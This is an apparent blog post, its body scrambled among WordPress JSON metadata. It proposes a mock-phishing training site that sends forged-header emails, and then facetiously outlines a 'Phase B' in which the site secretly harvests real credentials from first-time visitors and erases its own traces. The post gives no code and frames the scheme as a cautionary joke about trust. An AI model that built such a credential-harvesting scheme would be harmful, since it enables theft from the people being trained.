I propose that we produce a Mock-Phish web-site, which will have a goal of helping security professionals to train their co-workers, family and friends to avoid<\/em> falling for phishing scams.<\/p>\n One page will allow the user to nominate a naive computer user (known as the ‘mark’). They will enter the basic contact details of the mark (e.g. email address and perhaps name), a from address (e.g. security@yourorganisation<\/em>.com, support@yourbank<\/em>.com) and choose from a selection of pre-written phishing text.<\/p>\n The Mock-Phish site will then forward an email (with appropriately forged headers) to the mark.<\/p>\n The obfuscated URL inside the email points to a corresponding page of the Mock-Phish site, which invites the user to enter private information (e.g. corporate login name and password, or account number and PIN.) It has a submit button.<\/p>\n Sounds ominous, but here’s the twist: the submit button just does a regular This explanation page would link to a technical explanation page that shows how to read the HTML enough to convince yourself that your password wasn’t really stolen. It would also link to the first page that lets you mock-phish someone else.<\/p>\n I think this would be a useful tool for CIOs to tech people about the dangers of phishing by showing, rather than telling.<\/p>\n Once this site has been running for a while , is getting lots of hits, and has gained the trust of security professionals, Phase B comes into play.<\/p>\n Randomly, the first<\/em> time an IP address visits the site, it gets presented with different HTML – this time it is a genuine phishing attempt, that delivers the secret information into my clutches. It is protected so that once the submit button is pressed, Javascript runs and changes the DOM to remove all trace of itself. I haven’t worked out the technical details yet – I’ll leave that to my evil Javascripting henchmen.<\/p>\n Anyone who suspects will hit “Back” and find no sign of the dodgy source, or will revisit the site and again, find no sign of the dodgy source.<\/p>\n Oh well. I thought the Phase A was a good idea, until I came up with the Phase B. I should have realised more quickly that security professionals would have not trusted the site – well not if they had ever read Ken Thompson’s Reflections of Trusting Trust<\/a> anyway.<\/p>\n","protected":false},"excerpt":{"rendered":" I propose that we produce a Mock-Phish web-site, which will have a goal of helping security professionals to train their co-workers, family and friends to avoid<\/em> falling for phishing scams.<\/p>\n Once this site has been running for a while , is getting lots of hits, and has gained the trust of security professionals, Phase B comes into play.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_s2mail":"","footnotes":""},"categories":[34,27],"tags":[],"class_list":["post-182","post","type-post","status-publish","format-standard","hentry","category-software-development","category-thoughts-from-the-shower"],"_links":{"self":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/posts\/182","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/comments?post=182"}],"version-history":[{"count":0,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/posts\/182\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/media?parent=182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/categories?post=182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/tags?post=182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}HTTP-GET<\/code>, and does not forward the entered details. The entered details are simply discarded in the browser. The submit button simply directs the browser to another page that explains “You’ve Been Phished!” and warns about the dangers of phishing, and how to detect it. It explains that, while it still might be prudent to change your password, that your password hasn’t really been collected. <\/p>\nPhase B: Using My Powers For Evil<\/h3>\n